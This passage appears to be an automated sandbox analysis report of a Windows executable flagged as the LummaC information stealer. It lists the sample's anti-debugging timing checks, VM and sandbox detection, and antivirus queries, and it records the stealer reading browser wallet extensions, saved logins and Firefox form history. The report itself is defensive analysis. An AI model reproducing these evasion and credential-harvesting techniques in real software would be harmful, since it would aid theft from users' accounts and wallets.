            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B07D4 second address: 49B001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test esi, esi 0x00000009 pushad 0x0000000a jmp 00007FE9F881B0BDh 0x0000000f popad 0x00000010 je 00007FEA698C8F1Fh 0x00000016 xor eax, eax 0x00000018 jmp 00007FE9F87F47EAh 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 mov esi, eax 0x0000002a cmp esi, 00000000h 0x0000002d setne al 0x00000030 xor ebx, ebx 0x00000032 test al, 01h 0x00000034 jne 00007FE9F881B0B7h 0x00000036 jmp 00007FE9F881B1BFh 0x0000003b call 00007FE9FD166AD5h 0x00000040 mov edi, edi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FE9F881B0C7h 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B001B second address: 49B004E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A4FAh 0x00000007 pushfd 0x00000008 jmp 00007FE9F8B69B9Bh 0x0000000d jmp 00007FE9F8B69BA3h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c mov dh, F2h 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B004E second address: 49B0092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9F881B0C9h 0x00000009 sbb esi, 1372F986h 0x0000000f jmp 00007FE9F881B0C1h 0x00000014 popfd 0x00000015 mov esi, 61574B37h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0092 second address: 49B0096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0096 second address: 49B009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B009C second address: 49B00D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE9F8B69B9Dh 0x0000000b and ax, A196h 0x00000010 jmp 00007FE9F8B69BA1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B00D0 second address: 49B00D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B00D6 second address: 49B00FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FE9F8B69B9Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B00FF second address: 49B014A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE9F881B0BCh 0x00000008 add ax, 4348h 0x0000000d jmp 00007FE9F881B0BBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 jmp 00007FE9F881B0C6h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE9F881B0BEh 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B014A second address: 49B0195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov dl, 3Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d mov edx, esi 0x0000000f pushfd 0x00000010 jmp 00007FE9F8B69B9Eh 0x00000015 add cx, F338h 0x0000001a jmp 00007FE9F8B69B9Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [ebp-04h], 55534552h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FE9F8B69BA0h 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0195 second address: 49B01A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0CE4 second address: 49B0CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0CE8 second address: 49B0CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0E64 second address: 49B0E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0E68 second address: 49B0E6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0E6E second address: 49B0E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0E74 second address: 49B0E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0E78 second address: 49B0E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0ED4 second address: 49B0F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 test al, al 0x00000007 jmp 00007FE9F881B0BCh 0x0000000c je 00007FEA698AEB54h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE9F881B0C7h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C08B9 second address: 49C08E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE9F8B69BA9h 0x0000000a jmp 00007FE9F8B69B9Bh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C08E4 second address: 49C08FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F881B0C4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C08FC second address: 49C0988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FE9F8B69BA7h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE9F8B69BA2h 0x0000001a adc ecx, 401495C8h 0x00000020 jmp 00007FE9F8B69B9Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FE9F8B69BA8h 0x0000002c add esi, 4C2E9828h 0x00000032 jmp 00007FE9F8B69B9Bh 0x00000037 popfd 0x00000038 popad 0x00000039 popad 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FE9F8B69BA1h 0x00000042 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0988 second address: 49C0998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F881B0BCh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0998 second address: 49C099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C099C second address: 49C0A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c call 00007FE9F881B0BDh 0x00000011 pushfd 0x00000012 jmp 00007FE9F881B0C0h 0x00000017 xor ecx, 2AF92018h 0x0000001d jmp 00007FE9F881B0BBh 0x00000022 popfd 0x00000023 pop eax 0x00000024 jmp 00007FE9F881B0C9h 0x00000029 popad 0x0000002a mov esi, dword ptr [ebp+0Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov si, bx 0x00000033 movsx edi, si 0x00000036 popad 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A00 second address: 49C0A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A05 second address: 49C0A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A16 second address: 49C0A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A1A second address: 49C0A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A1E second address: 49C0A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A24 second address: 49C0A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEA698A8A38h 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ebx, eax 0x00000013 jmp 00007FE9F881B0C6h 0x00000018 popad 0x00000019 jmp 00007FE9F881B0C2h 0x0000001e popad 0x0000001f cmp dword ptr [75AB459Ch], 05h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FE9F881B0C7h 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A89 second address: 49C0B0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9F8B69B9Fh 0x00000009 xor ch, 0000000Eh 0x0000000c jmp 00007FE9F8B69BA9h 0x00000011 popfd 0x00000012 jmp 00007FE9F8B69BA0h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007FEA69C0F561h 0x00000020 pushad 0x00000021 mov cx, 605Dh 0x00000025 jmp 00007FE9F8B69B9Ah 0x0000002a popad 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FE9F8B69B9Dh 0x00000035 sbb ch, FFFFFFA6h 0x00000038 jmp 00007FE9F8B69BA1h 0x0000003d popfd 0x0000003e mov si, 67D7h 0x00000042 popad 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0B0E second address: 49C0B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov edi, 752F003Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE9F881B0C7h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0B35 second address: 49C0B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0B3B second address: 49C0B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C93 second address: 49C0CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69B9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9F8B69BA5h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CBA second address: 49C0CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CC0 second address: 49C0CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CC4 second address: 49C0CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Tries to evade debugger and weak emulator (self modifying code)
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 24E6AC instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2ADD05 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7512Thread sleep time: -36018s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7600Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
            Source: file.exe, 00000000.00000002.1602141941.0000000000204000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: file.exe, file.exe, 00000000.00000003.1601806618.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600993007.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602800267.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602800267.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600993007.0000000000AB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: file.exe, 00000000.00000003.1401613311.000000000532F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: file.exe, 00000000.00000002.1602141941.0000000000204000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: file.exe, 00000000.00000003.1401613311.0000000005329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: file.exe, 00000000.00000002.1602141941.0000000000204000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: *GProgram Manager
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, 00000000.00000003.1529241417.00000000052DD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1529513028.0000000000B5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
